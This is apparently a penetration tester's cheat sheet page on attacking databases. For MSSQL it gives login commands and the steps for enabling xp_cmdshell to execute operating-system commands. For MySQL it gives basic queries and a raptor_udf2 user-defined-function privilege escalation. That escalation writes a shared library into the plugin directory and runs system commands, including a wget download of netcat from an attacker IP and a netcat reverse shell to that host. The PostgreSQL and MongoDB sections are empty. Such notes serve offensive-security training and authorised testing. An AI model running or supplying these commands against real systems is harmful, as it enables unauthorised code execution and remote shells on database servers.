Databases

MSSQL

Login:

mssqlclient.py username:password@<targetName or address>
 
OR 
edit the /etc/freetds/freetds.conf file:
[HOST]
        host = IP
        port = 1435
        tds version = 8.0
create a ~/.sqshrc file:
\set username=USERNAME
\set password=PASSWORD
\set style=vert

Privesc/ execution:

EXEC sp_configure 'show advanced option', '1';
go
RECONFIGURE WITH OVERRIDE;
go
EXEC sp_configure 'xp_cmdshell', 1;
go
RECONFIGURE;
go
EXEC sp_configure 'show advanced option';
go
-------------[CHECK IT WORKS]------------
xp_cmdshell 'whoami';

MySQL / MariaDB

Login:

mysql -uUSER -pPASS -H HOST

Commands:

show database;
use DATABASE;
show tables;
select * from table;
show variables like 'plugin_dir';

UDF: 

create table foo(line blob);

insert into foo values(load_file('/var/www/raptor_udf2.so'));

select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';

create function do_system returns integer soname 'raptor_udf2.so';

select * from mysql.func;

select do_system('id > /var/www/out; chown www-data.www-data /var/www/out');

select do_system('wget http://192.168.49.246:8295/nc -O /var/www/nc');
select do_system('/var/www/nc 192.168.49.246 8295 -e /bin/bash');

PostGreSQL

Login:

MongoDB

Login:

PreviousEnumerationNextSQL Injection

Last updated